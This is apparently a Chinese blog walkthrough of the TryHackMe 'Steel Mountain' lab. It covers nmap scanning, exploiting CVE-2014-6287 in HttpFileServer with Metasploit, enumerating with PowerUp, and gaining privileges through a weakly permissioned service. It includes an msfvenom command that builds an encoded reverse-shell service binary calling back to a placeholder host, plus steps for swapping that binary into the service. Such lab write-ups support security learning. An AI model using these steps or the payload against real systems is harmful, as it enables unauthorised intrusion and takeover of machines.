No.1--TryHackMe--Steel Mountain

难度:简单


目的:

黑进机器人先生主题的Windows电脑。使用metasploit进行初始访问,使用powershell进行Windows特权升级枚举,并学习一种新技术来获得Administrator访问权限。


任务1 介绍

在这个房间里,您将枚举一台Windows机器,使用Metasploit获得初始访问权限,使用Powershell进一步枚举机器并将您的权限升级为管理员。

如果您没有合适的安全工具和环境,可以部署您自己的Kali Linux机器,并使用我们的Kali Room在您的浏览器中控制它。

请注意,这台机器不响应ping (ICMP),可能需要几分钟才能启动。


回答下面的问题:

部署机器
谁是本月最佳员工?


解题步骤

端口扫描

nmap -sV [target_ip]

发现以下几个端口:

port 80/tcp - HTTP - (Microsoft IIS httpd 8.5)
port 135/tcp - msrpc - (Microsoft Windows RPC)
port 139/tcp - Samba
port 445/tcp - Samba
port 3389/tcp - RDP - (ssl/ms-wbt-server - Remote Desktop)
port 8080/tcp - HTTP - (HttpFileServer httpd 2.3)

我们看到其中有两个http服务,80和8080端口。
直接使用浏览器访问80端口,能够看到员工的照片,查看图片的文件名,是我的需要的员工名字。


任务2 初次登录

现在您已经部署了机器,让我们获得一个初始shell!


回答下面的问题

用nmap扫描机器。另一个运行web服务器的端口是什么?
看看另一个web服务器。哪个文件服务器正在运行?
利用此文件服务器的CVE编号是多少?
使用Metasploit获取初始shell。什么是用户标志?


解题步骤

根据开始的扫描,我们看到另一个web服务器的端口为8080。
使用浏览器访问8080端口,可以看到暴露了很多信息,
在这里插入图片描述
在server information中可以看到服务器的详细信息。
在刚才的网页中,我们已经看到了服务器的版本等信息,使用exploit - db搜索,发现存在可利用漏洞cve-2014-6287。
下一步使用msf搜索这个可利用漏洞,设置RHOSTS和RPORT为目标IP和8080端口,输入命令run即可成功利用。
在这里插入图片描述
再启动shell,在桌面上即可发现我们要的root.txt。


任务3 特权升级

现在您已经在这台Windows机器上以Bill的身份创建了一个初始shell,我们可以进一步枚举这台机器并将我们的权限升级为root!


回答下面的问题

为了枚举这台机器,我们将使用一个名为PowerUp的powershell脚本,其目的是评估Windows机器并确定任何异常- "

您可以在这里下载脚本。如果您想通过命令行下载它,请注意不要下载GitHub页面而不是原始脚本。现在您可以使用Metasploit中的upload命令来上传脚本。

要使用Meterpreter执行此操作,我将键入load powershell into Meterpreter。然后输入powershell_shell进入powershell:

密切关注设置为true的CanRestart选项。显示为漏洞的服务的名称是什么?

CanRestart选项为true时,允许我们重新启动系统上的服务,应用程序的目录也是可写的。这意味着我们可以用恶意应用程序替换合法应用程序,重新启动服务,这将运行我们受感染的程序!

上传二进制文件并替换合法文件。然后以root身份重新启动程序以获得shell。

注意:服务显示为未引用(并且可以使用此技术加以利用),然而,在这种情况下,我们利用了服务文件上的弱文件权限。

根标志是什么?


解题步骤

下载题目中提供的脚本,使用已经成功连接的msf将脚本上传到靶机,安装并使用powershell,启动脚本,使用Invoke-AllChecks命令来检查可提权的方式。找到设置为true的服务AdvancedSystemCareService9,使用msfvenom制作一个可执行文件:

msfvenom -p windows/shell_reverse_tcp LHOST=CONNECTION_IP LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

将此文件上传到靶机,停止刚才我们找到的服务,使用生成的可执行文件覆盖原同名文件,在开启服务前开启一个端口监听,开启服务后我们会得到一个反向shell,在管理员的桌面可以找到root.txt。


任务4 没有Metasploit的访问和升级

未完待续


重点理解

1.发现的可利用的服务
2.msf构造的可执行文件
3.反向shell原理

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值